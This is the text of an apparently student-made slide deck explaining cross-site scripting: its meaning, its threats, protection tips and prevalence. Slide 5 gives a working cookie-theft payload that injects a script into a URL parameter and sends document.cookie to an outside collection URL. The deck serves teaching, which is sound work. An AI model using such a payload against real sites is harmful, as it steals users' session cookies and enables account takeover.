source : http://www.cgisecurity.com/articles/xss-faq.shtml 1

Cross Site Scripting

Information Systems Security

LAÏMOUCHE El Hadj, DAVY Benjamin

source : http://www.cgisecurity.com/articles/xss-faq.shtml 2

What is Cross Site Scripting ?

Users data gathered by a website.

Using malicious code hidden in links, posts on a board or e-mails.

Encoded to be less suspicious : e.g. in HEX.

source : http://www.cgisecurity.com/articles/xss-faq.shtml 3

What does XSS and CSS mean ?

Often people refer to Cross Site Scripting as CSS.

CSS is also used for Cascading Style Sheets.

When you see XSS you can be sure it’s talking about the security threat.

source : http://www.cgisecurity.com/articles/xss-faq.shtml 4

What are the threats of Cross Site Scripting ?

Injection of JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user.

Account, users settings, cookie theft, false advertising is possible.

source : http://www.cgisecurity.com/articles/xss-faq.shtml 5

How to : XSS cookie theft

Target a website using cookies.

Test how it works and where it’s possible to insert code (e.g. enabled HTML in a form).

Javascript code : http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

source : http://www.cgisecurity.com/articles/xss-faq.shtml 6

How to protect myself ?

Follow links from the main website.

Be careful XSS can be executed automatically when you open an e-mail, read a guestbook …

Turn off javascript.

Encryption is useless.

source : http://www.cgisecurity.com/articles/xss-faq.shtml 7

How common are XSS holes?

Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs.

10-25 XSS holes are found every month.

source : http://www.cgisecurity.com/articles/xss-faq.shtml 8

It’s over

Any questions ?